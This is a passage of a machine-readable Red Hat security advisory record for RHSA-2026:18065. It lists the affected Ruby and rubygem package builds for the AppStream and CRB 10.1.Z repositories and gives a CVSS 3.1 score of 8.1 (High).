"AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.src",
"AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-default-gems-0:3.3.10-12.el10_1.noarch",
"AppStream-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-doc-0:3.3.10-12.el10_1.noarch",
"AppStream-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-bundler-0:2.5.22-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-irb-0:1.13.1-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-minitest-0:5.20.0-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-power_assert-0:2.0.3-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-rake-0:13.1.0-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-rdoc-0:6.6.3.1-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-rexml-0:3.4.4-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-rss-0:0.3.1-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-test-unit-0:3.6.1-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-typeprof-0:0.21.9-12.el10_1.noarch",
"AppStream-10.1.Z:rubygems-0:3.5.22-12.el10_1.noarch",
"AppStream-10.1.Z:rubygems-devel-0:3.5.22-12.el10_1.noarch",
"CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.src",
"CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-default-gems-0:3.3.10-12.el10_1.noarch",
"CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-doc-0:3.3.10-12.el10_1.noarch",
"CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-bundler-0:2.5.22-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-irb-0:1.13.1-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-minitest-0:5.20.0-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-power_assert-0:2.0.3-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-rake-0:13.1.0-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-rdoc-0:6.6.3.1-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-rexml-0:3.4.4-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-rss-0:0.3.1-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-test-unit-0:3.6.1-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-typeprof-0:0.21.9-12.el10_1.noarch",
"CRB-10.1.Z:rubygems-0:3.5.22-12.el10_1.noarch",
"CRB-10.1.Z:rubygems-devel-0:3.5.22-12.el10_1.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:18065"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.src",
"AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-default-gems-0:3.3.10-12.el10_1.noarch",
"AppStream-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-doc-0:3.3.10-12.el10_1.noarch",
"AppStream-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-bundler-0:2.5.22-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-irb-0:1.13.1-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-minitest-0:5.20.0-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-power_assert-0:2.0.3-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-rake-0:13.1.0-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-rdoc-0:6.6.3.1-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-rexml-0:3.4.4-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-rss-0:0.3.1-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-test-unit-0:3.6.1-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-typeprof-0:0.21.9-12.el10_1.noarch",
"AppStream-10.1.Z:rubygems-0:3.5.22-12.el10_1.noarch",
"AppStream-10.1.Z:rubygems-devel-0:3.5.22-12.el10_1.noarch",
"CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.src",
"CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-default-gems-0:3.3.10-12.el10_1.noarch",
"CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-doc-0:3.3.10-12.el10_1.noarch",
"CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-bundler-0:2.5.22-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.aarch64",
